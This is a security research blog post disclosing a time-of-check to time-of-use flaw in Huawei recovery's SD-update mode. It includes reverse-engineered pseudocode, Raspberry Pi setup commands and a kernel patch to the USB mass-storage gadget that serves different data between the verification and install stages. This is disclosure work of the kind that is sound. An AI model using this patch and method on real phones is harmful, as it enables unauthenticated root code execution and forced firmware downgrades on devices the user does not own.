Last year we published UnZiploc, our research into Huawei’s OTA update implementation. Back then, we successfully identified logic vulnerabilities in the implementation of the Huawei recovery image that allowed remote or local attackers to achieve root-privileged code execution. After Huawei fixed the vulnerabilities we reported, we decided to take a second look at the new and improved recovery mode update process.
This time, we managed to identify a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in recovery mode, enabling unauthenticated firmware updates, firmware downgrades to a known-vulnerable version, or other system modifications. Our advisory for the vulnerability is published here.
The story of exploiting this vulnerability was made interesting by the fact that the exploit abuses incorrect assumptions about the behavior of an external SD card, so we needed some hardware-fu to actually be able to trigger it. In this blog post, we describe how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
Huawei SD-update: Updates via SD Card
Huawei devices implement a proprietary update solution, which is identical throughout Huawei’s device lineup regardless of the chipset employed (Hisilicon, Qualcomm, Mediatek) or the base OS used (EMUI, HarmonyOS).
This common update solution in fact offers many ways to apply a system update; one of them is the “SD-update”. As its name implies, the “SD-update” method expects the update file to be stored on external media, such as an SD card or a USB flash drive. After reverse engineering how Huawei implements this mode, we identified a logic vulnerability in the handling of the update file located on external media, where the update file gets reread between different verification phases.
While this basic vulnerability primitive is straightforward, exploiting it presented some interesting challenges: we needed to develop a custom software emulation of a USB flash drive to be able to provide the recovery with different data on each read, and we had to identify additional gaps in the authentication implementation of the update process to make arbitrary code execution as root possible in recovery mode.
Time-of-Check to Time-of-Use
The root cause of the vulnerability lies in an unfortunate design decision of the external media update path of the recovery binary: when the user supplies the update files on a memory card or a USB mass-storage device, the recovery handles them in-place.
From a bird’s-eye view the update process contains two major steps: verification of the ZIP file signature and then applying the actual system update. The problem is that the recovery binary accesses the external storage device numerous times during the update process; e.g. first it discovers the relevant update files, then reads the version and model numbers, verifies the authenticity of the archive, etc.
So in the case of a legitimate update archive, once the verification succeeds, the recovery reads the media again to perform the actual installation. But a malicious actor can swap the update file right between the two stages, so the installation phase uses a different, unverified update archive. In essence, we have a textbook “Time-of-Check to Time-of-Use” (ToC-ToU) vulnerability, meaning that a race condition can be introduced between the “checking” (verification) and the “using” (installation) stages. The next step was figuring out how we could actually trigger this vulnerability in practice!
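To make the pattern concrete, here is a minimal, self-contained toy model (illustration only, not Huawei’s code) of the race: the “drive” serves pristine data while it is being verified and swapped data when it is read again for installation, which is exactly the behavior FaultyUSB later implements at the block level.
# Toy model of the ToC-ToU primitive (illustration only, not the actual recovery code).
class FaultyDrive:
    def __init__(self, benign, malicious):
        self.benign, self.malicious, self.reads = benign, malicious, 0

    def read(self):
        # An honest drive always returns the same bytes for the same offset;
        # a "faulty" one is free to change its answer between reads.
        self.reads += 1
        return self.benign if self.reads == 1 else self.malicious

def recovery_update(drive):
    data = drive.read()                    # time of check: this copy is verified
    assert data == b"signed-update-zip"    # "signature verification" succeeds
    data = drive.read()                    # time of use: the media is read again
    return data                            # ...and this is what gets installed

print(recovery_update(FaultyDrive(b"signed-update-zip", b"attacker-update-zip")))
# prints b'attacker-update-zip'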
Attacking Multiple Reads in the Recovery Binary
With an off-the-shelf USB flash drive it is clear that, for a given offset, two reads without an intermediate write must return the same data; otherwise the drive would be considered faulty. In terms of the update procedure this means data consistency is preserved: at every point during the update, the data on the external drive matches what the recovery binary reads. Consequently, as long as a legitimate USB drive is used, the design decision of using the update file in-place is functionally correct.
Now consider a “faulty” USB flash drive, which returns different data when the same offset is read twice (of course, without any writes in between). This breaks the data-consistency assumption of the update process, as different update steps may see the update file differently.
The update media is basically accessed for three distinct reasons: listing and opening files, opening the update archive as a traditional ZIP file, and reading the update archive for Android-specific signature verification.
These access types could enable different modes of exploiting this vulnerability by changing the data returned by the external media.
For example, in the case of multiple file system accesses of the same location, the update.zip file itself can be replaced as-is with a completely unrelated file.
Alternatively, multiple reads during the ZIP parsing can be turned into smuggling new ZIP entries inside the original archive (see the CVE-2021-40045: Huawei Recovery Update Zip Signature Verification Bypass vulnerability in UnZiploc).
Accordingly, multiple kinds of exploitation goals can be set. For example, by only modifying the content of the UPDATE.APP file of the update archive at install time, an arbitrary set of partitions can be written with arbitrary data on the main flash. A more generic approach is to gain code execution just before writing to flash in the EreInstallPkg function, by smuggling a custom update-binary into the ZIP file.
In the following we are going to use the approach of injecting a custom binary in order to achieve arbitrary code execution by circumventing the update archive verification.
At this point we must mention a crucial factor: the caching behavior of the underlying Linux system and its effects on exploitability. For readability, this challenge is outlined in the next section; for now we continue with the assumption that we are able to swap results between repeated read operations.
Sketching out the code flow of an update procedure helps to pinpoint exactly where multiple reads can occur. Since our last exploit of Huawei’s recovery mode some changes have occurred (e.g. functions got renamed), so the update flow is detailed again here for clarity.
First of all, the “SD-update” method is handled by HuaweiUpdateNormal, which essentially wraps the HuaweiUpdateBase function.
Below is an excerpt of the function call tree of HuaweiUpdateBase, mostly indicating the functions which interact with the update media or contain essential verification functions.
HuaweiUpdateBase
├── [> DoCheckUpdateVersion <]
│ ├── {> hw_ensure_path_mounted("/usb") <}
│ ├── CheckVersionInZipPkg
│ │ ├── mzFindZipEntry("SOFTWARE_VER_LIST.mbn")
│ │ ├── mzFindZipEntry("SD_update.tag")
│ │ ├── mzFindZipEntry("OTA_update.tag")
│ │ ├── DoCheckVersion
│ │ ├── mzFindZipEntry("BOARDID_LIST.mbn")
│ └── {> hw_ensure_path_unmounted("/usb") <}
└── HuaweiOtaUpdate
└── DoOtaUpdate
├── MountSdCardWithRetry
│ └── {> hw_ensure_path_mounted("/usb") <}
├── PkgTypeUptVerPreCheck
│ └── HwUpdateTagPreCheck
│ └── UpdateTagCheckInPkg
│ ├── mzFindZipEntry("full_mainpkg.tag")
│ └── GetInfoFromTag("UPT_VER.tag")
├── [> HuaweiUpdatePreCheck <]
│ ├── HuaweiSignatureAndAuthVerify
│ │ ├── HwMapAndVerifyPackage
│ │ │ ├── do_map_package
│ │ │ │ └── hw_ensure_path_mounted("/usb")
│ │ │ ├── HwSignatureVerifyPackage
│ │ │ │ ├── GetInfoFromTag("hotakey_sign_version.tag")
│ │ │ │ └── verify_file_v1
│ │ │ │ └── verifyInstance.Verify
│ │ │ └── GetInfoFromTag("META-INF/CERT.RSA")
│ │ ├── IsSdRootPackage
│ │ │ └── get_zip_pkg_type
│ │ │ ├── mzFindZipEntry("SD_update.tag")
│ │ │ ├── mzFindZipEntry("OTA_update.tag")
│ │ │ └── get_pkg_type_by_tag
│ │ │ └── mzFindZipEntry("OTA/SD_update.tag")
│ │ └── HwUpdateAuthVerify
│ │ ├── IsNeedUpdateAuth
│ │ ├── IsUnauthPkg
│ │ │ ├── IsSDupdatePackageCompress
│ │ │ │ └── mzFindZipEntry("SD_update.tag")
│ │ │ └── mzFindZipEntry("skipauth_pkg.tag")
│ │ └── get_update_auth_file_path
│ │ └── mzFindZipEntry("VERSION.mbn")
│ ├── DoSecVerifyFromZip
│ │ └── HwSecVerifyFromZip
│ │ └── mzFindZipEntry("sec_xloader_header")
│ ├── IsAllowShipDeviceUpdate
│ ├── MtkDevicePreUpdateCheck
│ ├── CheckBoardIdInfo
│ │ └── mzFindZipEntry("BOARDID_LIST.mbn")
│ ├── UpdatePreCheck_wrapper
│ │ └── UpdatePreCheck
│ │ └── CheckPackageInfo
│ │ ├── MapAndOpenZipPkg
│ │ ├── InitPackageInfo
│ │ │ └── mzFindZipEntry("packageinfo.mbn")
│ │ └── CheckZipPkgInfo
│ └── USBUpdateVersionCheck
├── HuaweiUpdatePreUpdate
└── [> EreInstallPkg <]
├── hw_setup_install_mounts
│ └── {> hw_ensure_path_unmounted("/usb") <}
├── do_map_package
│ └── {> hw_ensure_path_mounted("/usb") <}
├── mzFindZipEntry("META-INF/com/google/android/update-binary")
└── execv("/tmp/update_binary")
The functions in square brackets divide the update process into three phases:
- Device firmware version compatibility checking
- Android signature verification, update type and version checking
- Update installation via the provided update-binary file
In the first stage the version checking makes sure that the provided update archive is compatible with the current device model and the installed OS version. (The code snippets below are from the reverse engineered pseudocode.)
bool DoCheckUpdateVersion(ulong argc, char **argv) {
... /* ensures the battery is charged enough, else exit */
for (pkgIndex = 1; pkgIndex < argc; pkgIndex++) {
curr_arg = argv[pkgIndex];
if (!curr_arg || strncmp(curr_arg,"--update_package=",0x11)) {
log("%s:%s,line=%d:skip path:%s,pkgIndex:%d\n","Info","CheckAllPkgVersionAllow",0x1dd,curr_arg,pkgIndex & 0xffffffff);
continue;
}
curr_arg = curr_arg + 0x11;
log("%s:%s,line=%d:reallyPath:%s\n","Info","DoCheckUpdateVersion",0x1c0,curr_arg);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Here curr_arg points to the file path of the update archive *
* The media which contains this file is getting mounted *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
r = hw_ensure_path_mounted_wrapper(curr_arg,"DoCheckUpdateVersion");
if (r < 0) {
log("%s:%s,line=%d:mount %s fail\n","Err","DoCheckUpdateVersion",0x1c2,curr_arg);
return false;
}
set_versioncheck_flag(0);
SetPkgSignatureFlag(1);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Examine the 'SOFTWARE_VER_LIST.mbn' file for compatibility *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
check_ret = CheckVersionInZipPkg(curr_arg);
SetPkgSignatureFlag(0);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Explicitly unmount the media holding the update archive *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
r = hw_ensure_path_unmounted_wrapper(curr_arg,"DoCheckUpdateVersion");
if (r < 0) {
log("%s:%s,line=%d:unmount %s fail\n","Warn","DoCheckUpdateVersion",0x1cb,curr_arg);
}
if ((check_ret & 1) == 0) {
log("%s:%s,line=%d:%s,not allow in version control\n","Err","DoCheckUpdateVersion",0x1ce,curr_arg);
log("%s:%s,line=%d:push UPDATE_VERSION_CHECK_FAIL_L1\n","Info","DoCheckUpdateVersion",0x1cf);
push_command_stack(&command_stack,0x85);
return false;
}
ret = true;
}
return ret;
}
The second stage contains most of the complex verification functionality, such as checking the Android-specific cryptographic signature and the update authentication token. It also performs an extensive inspection of the compatibility between the update and the device.
int HuaweiOtaUpdate(int argc, char **argv) {
...
log("%s:%s,line=%d:push HOTA_BEGIN_L0\n","Info","HuaweiOtaUpdate",0x5a6);
...
ret = DoOtaUpdate(argc, argv);
...
}
int DoOtaUpdate(int argc, char **argv) {
... /* tidy the update package paths */
g_totalPkgSz = 0;
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* The media which contains the update package gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
MountSdCardWithRetry(path_list[pkgIndex],5);
... /* ensuring that the update package does exist */
g_totalPkgSz = g_totalPkgSz + auStack568._48_8_;
}
log("%s:%s,line=%d:g_totalPkgSz = %llu\n","Info","DoOtaUpdate",0x45b,g_totalPkgSz);
result = PkgTypeUptVerPreCheck(argc,argv,ProcessOtaPackagePath);
if ((result & 1) == 0) {
log("%s:%s,line=%d:PkgTypeUptVerPreCheck fail\n","Err","DoOtaUpdate",0x460);
return 1;
}
result = HuaweiUpdatePreCheck(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreCheck fail\n","Err","DoOtaUpdate", 0x465);
return 1;
}
result = HuaweiUpdatePreUpdate(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreUpdate fail\n","Err","DoOtaUpdate", 0x46b);
return 1;
}
...
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
log("%s:%s,line=%d:push HOTA_PRE_L1\n","Info","DoOtaUpdate",0x474);
push_command_stack(&command_stack,3);
package_path = path_list[pkgIndex];
... /* ensure the package does exists */
... /* update the visual update progress bar */
log("%s:%s,line=%d:pop HOTA_PRE_L1\n","Info","DoOtaUpdate",0x48d);
pop_command_stack(&command_stack);
log("%s:%s,line=%d:push HOTA_PROCESS_L1\n","Info","DoOtaUpdate",0x48f);
push_command_stack(&command_stack,4);
log("%s:%s,line=%d:OTA update from:%s\n","Info","DoOtaUpdate",0x491,
package_path);
/* 'IsPathNeedMount' returns true for the SD update package paths */
needs_mount = IsPathNeedMount(package_path);
ret = EreInstallPkg(package_path,local_1b4,"/tmp/recovery_hw_install",needs_mount & 1);
... /* update the visual update progress bar */
}
}
int MountSdCardWithRetry(char *path, uint retry_count) {
... /* sanity checks */
if (retry_count < 6 && (!strstr(path,"/sdcard") || !strstr(path,"/usb"))) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* USB drives mounted under the '/usb' path, so this path is taken *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
for (trial_count = 1; trial_count < retry_count; trial_count++) {
if (hw_ensure_path_mounted(path))
return 0;
... /* error handling */
sleep(1);
}
log("%s:%s,line=%d:mount %s fail\n","Err","MountSdCardWithRetry",0x8b1,path);
return -1;
}
if (hw_ensure_path_mounted(path)) {
... /* error handling */
return -1;
}
return 0;
}
Finally, in the third stage, the update installation begins by extracting the update-binary from the update archive and executing it. From this point forward, the bundled update binary handles the rest of the update process, like extracting the UPDATE.APP file containing the actual data to be flashed.
uint EreInstallPkg(char *path, undefined *wipeCache, char *last_install, bool need_mount) {
... /* create and write the 'path' value into the 'last_install' file */
if (!path || g_otaUpdateMode != 1 || get_current_run_mode() != 2) {
log("%s:%s,line=%d:path is null or g_otaUpdateMode != 1 or current run mode is %d!\n","Err","HuaweiPreErecoveyUpdatePkgPercent",0x493,get_current_run_mode());
ret = hw_setup_install_mounts();
} else {
... /* with SD update mode this path is not taken */
}
if (!ret) {
log("%s:%s,line=%d:failed to set up expected mounts for install,aborting\n",
"Err","install_package",0x5b8);
return 1;
}
... /* logging and visual progress related functions */
ret = do_map_package(path, need_mount & 1, &package_map);
if (!ret) {
log("%s:%s,line=%d:map path [%s] fail\n","Err","ReallyInstallPackage",0x575,path);
return 2;
}
zip_handle = mzOpenZipArchive(package_map,package_length,&archive);
... /* error handling */
updatebinary_entry = mzFindZipEntry(&archive,"META-INF/com/google/android/update-binary");
log("%s:%s,line=%d:push HOTA_TRY_BINARY_L2\n","Info","try_update_binary",0x21e);
push_command_stack(&command_stack,0xd);
... /* error handling */
unlink("/tmp/update_binary");
updatebinary_fd = creat("/tmp/update_binary",0x1ed);
mzExtractZipEntryToFile(&archive,updatebinary_entry,updatebinary_fd);
EnsureFileClose(updatebinary_fd,"/tmp/update_binary");
... /* FindUpdateBinaryFunc: check the kind of the update archive */
mzCloseZipArchive(&archive);
...
if (fork() == 0) {
...
execv(updatebinary_path, updatebinary_argv);
_exit(-1);
}
log("%s:%s,line=%d:push HOTA_ENTERY_BINARY_L3\n","Info","try_update_binary",0x295);
push_command_stack(&command_stack,0x16);
...
}
int hw_setup_install_mounts(void) {
...
for (partition_entry : g_partition_table) {
if (!strcmp(partition_entry, "/tmp")) {
if (hw_ensure_path_mounted(partition_entry)) {
log("%s:%s,line=%d:failed to mount %s\n","Err","hw_setup_install_mounts",0x5a1,partition_entry);
return -1;
}
}
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Every entry in the partition table gets unmounted except /tmp *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
else if (hw_ensure_path_unmounted(partition_entry)) {
log("%s:%s,line=%d:fail to unmount %s\n","Warn","hw_setup_install_mounts",0x5a6,partition_entry);
if (!strcmp(partition_entry,"/data") && !try_umount_data())
log("%s:%s,line=%d:umount data fail\n","Err","hw_setup_install_mounts",0x5a9);
}
}
return 0;
}
int do_map_package(char *path, bool needs_mount, void *package_map) {
... /* sanity checks */
if (needs_mount) {
if (*path == '@' && hw_ensure_path_mounted(path + 1)) {
log("%s:%s,line=%d:mount (path+1) fail\n","Warn","do_map_package",0x3f0);
return 0;
}
for (trial_count = 0; trial_count < 10; trial_count++) {
log("%s:%s,line=%d:try to mount %s in %d/%u times\n","Info","do_map_package",0x3f5,path,trial_count,10);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* needs_mount = true, so the USB flash drive gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
if (hw_ensure_path_mounted(path)) {
log("%s:%s,line=%d:try to mount %s in %d times successfully\n","Info","do_map_package",0x3f7,path,trial_count);
return 0;
}
... /* error handling */
sleep(1);
}
... /* error handling */
}
if (sysMapFile(path,package_map) == 0) {
log("%s:%s,line=%d:map path [%s] success\n","Info","do_map_package",0x40a,path);
return 1;
}
log("%s:%s,line=%d:map path [%s] fail\n","Err","do_map_package",0x407,path);
return 0;
}
Based on this flow it is easy to spot that if an update archive gets past the second phase (cryptographic verification), code execution is achieved afterwards, because the recovery process will try to extract and run the update-binary file of the update archive.
Thanks to these multiple reads, the attacker could therefore provide different update archives at each of these stages, so a straightforward exploitation plan emerges:
- Version checking stage: construct a valid SOFTWARE_VER_LIST.mbn file
- Signature verification: supply a pristine update archive
- Installation: inject the custom update-binary
Circumventing Linux Kernel Caching Of External Media
The previous section introduced our “straightforward” exploitation plan.
However, in practice, it does not suffice to treat the file read syscalls of the recovery binary as if each of them directly resulted in a unique read request to the external media.
The relevant update files are actually mmap-ed by the recovery binary, and the resulting memory read accesses are handled first by the file system API, then by the block device layer of the Linux kernel, and only after all those layers are they forwarded to the external media.
The file system API uses the actual file system implementation (e.g. exFAT) to turn the high level requests (e.g. “read the first 0x400 bytes from the file named /usb/update_sd_base.zip”) into lower level accesses of the underlying block device (e.g. “read 0x200 bytes from offset 0x12340000 and read 0x200 bytes from offset 0x56780000 on the media”).
The block device layer generates the lowest level request, which can be interpreted directly by the storage media, e.g. SCSI commands in case of a USB flash drive.
In addition, the Linux kernel caches the read responses of both the file system API (page cache) and the block devices (block cache, part of the page cache). So the second time the same read request arrives, the response may be served from the cache instead of the storage media, depending on the amount of free memory.
Therefore, in the real world, frequent rereads of external media normally do not occur, thanks to the caching of the operating system. In other words, it is up to the Linux kernel’s caching algorithm, and heavily dependent on the amount of free memory available, whether a memory access issued by the recovery binary actually translates into a direct read request to the external media. In practice, our analysis showed that the combination of the caching policy and the roughly 7 GB of free memory (on flagship phones) works surprisingly well: virtually no rereads occur while handling update files, which are at most 5 GB in size and thus fit into memory as a whole. So, at first glance, you might think that the Linux kernel’s caching behavior would prevent us from actually exploiting this theoretical ToC-ToU vulnerability. (Un)fortunately, this was not the case!
We can take a step back from the caching behavior of normal read operations and look at the functions highlighted in curly brackets in the code flow chart above: those implement the mount and unmount commands. This shows that the file system of the external media is unmounted and remounted between the stages we’ve previously defined! The file cache of the Linux kernel is naturally bound to the backing file system, so when an unmount event happens, the corresponding cache entries are flushed. The subsequent mount command starts with an empty cache, so the update file must be read again directly from the external media. This deterministically enables an attacker to supply a different update archive, or even a completely new file system, at each mount command, and thus it can ultimately be used to bypass the cryptographic verification and supply an arbitrary update archive as described above. Phew :)
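This is easy to convince yourself of on any Linux box with an external drive attached: the second read of a file is served from the page cache and is near-instant, but after an unmount/remount cycle the read has to go out to the device again. A crude timing check along these lines demonstrates it (hypothetical device and mount point, requires root):
# Crude page cache demonstration (hypothetical /dev/sda1 and /mnt/usb paths).
# The second read is served from the page cache; after umount+mount the cache
# belonging to that file system is gone, so the read hits the device again.
import subprocess
import time

def timed_read(path):
    t0 = time.monotonic()
    with open(path, "rb") as f:
        while f.read(1 << 20):
            pass
    return time.monotonic() - t0

print("cold read:     %.3fs" % timed_read("/mnt/usb/update.zip"))
print("cached read:   %.3fs" % timed_read("/mnt/usb/update.zip"))
subprocess.run(["umount", "/mnt/usb"], check=True)
subprocess.run(["mount", "/dev/sda1", "/mnt/usb"], check=True)
print("after remount: %.3fs" % timed_read("/mnt/usb/update.zip"))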
Creating FaultyUSB
Based on the above we have an exploit plan, but what was left was actually implementing the previously discussed “FaultyUSB”: a USB flash drive (USB-OTG mass storage) that can detect the mount events and alter the response data based on a trigger condition. In the following we give a brief, practical guide on how we set up our test environment.
Raspberry Pi As A Development Platform
The Linux kernel supports the USB OTG mass storage device class in general, but we needed to find a computer with the requisite hardware support for USB OTG, since regular PCs are designed to work in USB host mode only. Of course, Huawei phones themselves support this mode, but for ease of development we selected the popular Raspberry Pi single-board computer. Specifically, a Raspberry Pi 4B (RPi) was used, as it supports USB OTG mode on its USB-C connector.
“Raspberry Pi OS Lite (64bit) (2022.04.04.)” is used as the base image for the RPi and written to an SD card. The size of the SD card does not matter as long as the OS fits on it; roughly 2 GB is the recommended minimum.
Writing the image to the SD card is straightforward:
xzcat 2022-04-04-raspios-bullseye-arm64-lite.img.xz | sudo dd of=/dev/mmcblk0 bs=4M iflag=fullblock oflag=direct
Then we mount the first partition, create the user account file and the configuration file, and enable the SSH server.
The userconf.txt file below defines the pi user with the raspberry password.
The config file disables Wi-Fi and Bluetooth to lower power usage, and configures the USB controller in OTG mode.
The kernel command line loads the dwc2 and g_mass_storage modules, so the USB controller comes up as a mass storage gadget.
mount /dev/mmcblk0p1 /mnt && cd /mnt
touch ssh
echo 'pi:$6$/4.VdYgDm7RJ0qM1$FwXCeQgDKkqrOU3RIRuDSKpauAbBvP11msq9X58c8Que2l1Dwq3vdJMgiZlQSbEXGaY5esVHGBNbCxKLVNqZW1' > userconf.txt
echo 'arm_64bit=1
dtoverlay=dwc2,dr_mode=peripheral
#arm_freq=600
arm_boost=0
disable_splash=1
dtoverlay=disable-bt
dtoverlay=disable-wifi
boot_delay=0' > config.txt
echo 'console=serial0,115200 console=tty1 root=PARTUUID=<UUID>-02 rootfstype=ext4 rootwait modules-load=dwc2,g_mass_storage' > cmdline.txt
cd && umount /dev/mmcblk0p1
Now we can put the SD card back into the RPi and connect it to a router via the Ethernet interface.
By default, Raspberry Pi OS tries to negotiate an IP address via DHCP and advertises itself as raspberrypi.local over mDNS, so at first we simply connected to it over SSH with the previously configured username and password.
However, we did not find DHCP reliable enough, so we decided to use a static IP address instead:
sudo systemctl disable dhcpcd.service
sudo systemctl stop dhcpcd.service
echo 'auto eth0
allow-hotplug eth0
iface eth0 inet static
address 10.1.0.1
netmask 255.255.255.0' | sudo tee /etc/network/interfaces.d/eth0
Getting High On Our Own Power Supply
The power supply of the Raspberry Pi 4B proved to be problematic for this particular setup. It can be powered either through the USB-C connector or through dedicated pins of the IO header, and it requires a non-trivial amount of power, about 1.5 A. When power is supplied from the IO header, the regulated 5 V also appears on the VDD pins of the USB-C connector, and a connected Huawei phone then incorrectly detects the RPi as being in USB host mode instead of the desired OTG mode. As it turned out, the USB-C connector on the RPi is not in fact fully USB-C compliant…
Luckily, the tested Huawei phones can supply enough power to boot the RPi. However, it takes about 8-10 seconds for the RPi to fully boot, and Huawei phones cut the power while rebooting into recovery mode. This means that the RPi shuts down for lack of power, and the target Huawei phone only re-enables power over USB-C once it has already booted into recovery mode. That’s why it is possible (and during our development this occurred several times) that the RPi misses the recovery’s timeout window for detecting a USB drive, simply because it can’t boot up fast enough.
One way to solve this problem is to boot the phone into eRecovery mode by holding the Power and Volume Up buttons, because that way the update doesn’t begin automatically, giving the RPi some time to boot up. But we wanted to support a more comfortable way of updating, from the “Project Menu” application via the “Software Upgrade / Memory card Upgrade” option, which applies the update automatically without waiting for any user interaction.
Our solution was to power the RPi through a USB-C breakout board from a dedicated power supply adapter. The breakout board passes the data lines through to the target Huawei phone, but the VDD lines are disconnected (i.e. the PCB traces are cut) in the direction of the phone to prevent the RPi from being recognized as a host device. With this setup the RPi can be powered independently of the target device, and it can be accessed over SSH via the Ethernet interface regardless of the power state of the target Huawei phone.
To further tweak the OS boot time and power consumption, we disable a few unnecessary services:
sudo systemctl disable rsyslog.service
sudo systemctl stop rsyslog.service
sudo systemctl disable avahi-daemon
sudo systemctl stop avahi-daemon
sudo systemctl disable avahi-daemon.socket
sudo systemctl stop avahi-daemon.socket
sudo systemctl disable triggerhappy.service
sudo systemctl stop triggerhappy.service
sudo systemctl disable wpa_supplicant.service
sudo systemctl stop wpa_supplicant.service
sudo systemctl disable systemd-timesyncd
sudo systemctl stop systemd-timesyncd
To further optimize power consumption, we disabled as much of the currently unnecessary GPU subsystem as we could. To avoid premature write-exhaustion of the SD card, we also disable persisting the log files, because we are about to generate quite a few megabytes of them.
echo 'blacklist bcm2835_codec
blacklist bcm2835_isp
blacklist bcm2835_v4l2
blacklist drm
blacklist rpivid_mem
blacklist vc_sm_cma' | sudo tee /etc/modprobe.d/blacklist-bcm2835.conf
echo '[Journal]
Storage=volatile
RuntimeMaxUse=64M' | sudo tee /etc/systemd/journald.conf
Finally we restart the RPi, verify that it is still accessible over SSH, and shut it down in preparation for a kernel build.
Kernel Module Patching
The main requirement of the programmable USB OTG mass storage device is the ability to detect the update state, so that it can serve different results based on the current stage.
The most obvious place to implement such a feature is directly in the mass storage functionality implementation, which is located at drivers/usb/gadget/function/f_mass_storage.c in the Linux kernel.
The crucial feature of FaultyUSB is the trigger implementation, which dictates when to hide the smuggled ZIP file. To implicitly detect the state of the update process, a very simple counting algorithm proved to be sufficient: specific parts of the file system appear to be read only during mount events, so by counting mount-like read patterns the current update stage can be recovered.
While the trigger condition is active, the read responses are modified by masking them with zeros. The masked address range should be configured to cover the smuggled ZIP at the end of the update archive.
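Stripped of the kernel plumbing, the added do_read() logic boils down to the following user-space paraphrase (our model of the patch shown right below, not part of the actual kernel code):
# User-space paraphrase of the patched do_read() behavior (see the diff below):
# while the trigger is "armed" (counter == 1) every read overlapping the payload
# area is zero-masked, and any read touching the trigger offset (the archive's
# directory entry) decrements the counter.
def handle_read(buf: bytearray, file_offset: int, lun: dict) -> bytearray:
    p_off, p_size = lun["payload_offset"], lun["payload_size"]
    if file_offset + len(buf) > p_off and file_offset < p_off + p_size:
        if lun["trigger_counter"] == 1:
            begin = max(file_offset, p_off) - file_offset
            end = min(file_offset + len(buf), p_off + p_size) - file_offset
            buf[begin:end] = bytes(end - begin)      # hide the smuggled ZIP
    if (lun["trigger_counter"] > 0 and
            lun["trigger_offset"] >= file_offset and
            lun["trigger_offset"] < file_offset + len(buf)):
        lun["trigger_counter"] -= 1                  # another mount-like access seen
    return buf
With trigger_counter=4, for instance, the payload area is hidden between the third and fourth reads of the trigger offset, a window the PoC tunes to coincide with the verification stage.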
Here is the mass_storage_patch.diff file, with a huge amount of logging code:
diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
index 6ad669dde..653463213 100644
--- a/drivers/usb/gadget/function/f_mass_storage.c
+++ b/drivers/usb/gadget/function/f_mass_storage.c
@@ -596,6 +596,8 @@ static int do_read(struct fsg_common *common)
unsigned int amount;
ssize_t nread;
+ loff_t begin, end;
+
/*
* Get the starting Logical Block Address and check that it's
* not too big.
@@ -662,8 +664,35 @@ static int do_read(struct fsg_common *common)
file_offset_tmp = file_offset;
nread = kernel_read(curlun->filp, bh->buf, amount,
&file_offset_tmp);
+ LINFO(curlun, "READ A=0x%llx S=0x%x\n", file_offset, amount);
VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
(unsigned long long)file_offset, (int)nread);
+
+ /* mask read on trigger (e.g. when trigger_counter == 1) */
+ if (
+ ((file_offset + amount) > curlun->payload_offset) &&
+ (file_offset < (curlun->payload_offset + curlun->payload_size))
+ ) {
+ LINFO(curlun, "READ ON PAYLOAD AREA (A=0x%llx S=0x%x)\n",
+ file_offset, amount);
+ if (curlun->trigger_counter == 1) {
+ begin = max(file_offset, curlun->payload_offset) - file_offset;
+ end = min(file_offset + amount, curlun->payload_offset + curlun->payload_size) - file_offset;
+ LINFO(curlun, "READ ZERO-MASKED RANGE: [0x%llx;0x%llx)\n", begin, end);
+ memset(bh->buf + begin, 0, end-begin);
+ }
+ }
+
+ /* detect read on the trigger offset and decrement the trigger counter */
+ if (
+ (curlun->trigger_counter > 0) &&
+ (curlun->trigger_offset >= file_offset) &&
+ (curlun->trigger_offset < (file_offset+amount))
+ ) {
+ LINFO(curlun, "READ ON TRIGGER OFFSET: T=%d\n", curlun->trigger_counter);
+ curlun->trigger_counter -= 1;
+ }
+
if (signal_pending(current))
return -EINTR;
@@ -858,6 +887,7 @@ static int do_write(struct fsg_common *common)
file_offset_tmp = file_offset;
nwritten = kernel_write(curlun->filp, bh->buf, amount,
&file_offset_tmp);
+ LINFO(curlun, "WRITE A=0x%llx S=0x%x\n", file_offset, amount);
VLDBG(curlun, "file write %u @ %llu -> %d\n", amount,
(unsigned long long)file_offset, (int)nwritten);
if (signal_pending(current))
@@ -922,6 +952,7 @@ static void invalidate_sub(struct fsg_lun *curlun)
unsigned long rc;
rc = invalidate_mapping_pages(inode->i_mapping, 0, -1);
+ LINFO(curlun, "invalidate_mapping_pages");
VLDBG(curlun, "invalidate_mapping_pages -> %ld\n", rc);
}
@@ -996,6 +1027,7 @@ static int do_verify(struct fsg_common *common)
file_offset_tmp = file_offset;
nread = kernel_read(curlun->filp, bh->buf, amount,
&file_offset_tmp);
+ LINFO(curlun, "VERIFY A=0x%llx S=0x%x\n", file_offset, amount);
VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
(unsigned long long) file_offset,
(int) nread);
@@ -2733,6 +2765,12 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
lun->initially_ro = lun->ro;
lun->removable = !!cfg->removable;
+ /* ToC-ToU patch */
+ lun->trigger_counter = cfg->trigger_counter;
+ lun->trigger_offset = cfg->trigger_offset;
+ lun->payload_offset = cfg->payload_offset;
+ lun->payload_size = cfg->payload_size;
+
if (!common->sysfs) {
/* we DON'T own the name!*/
lun->name = name;
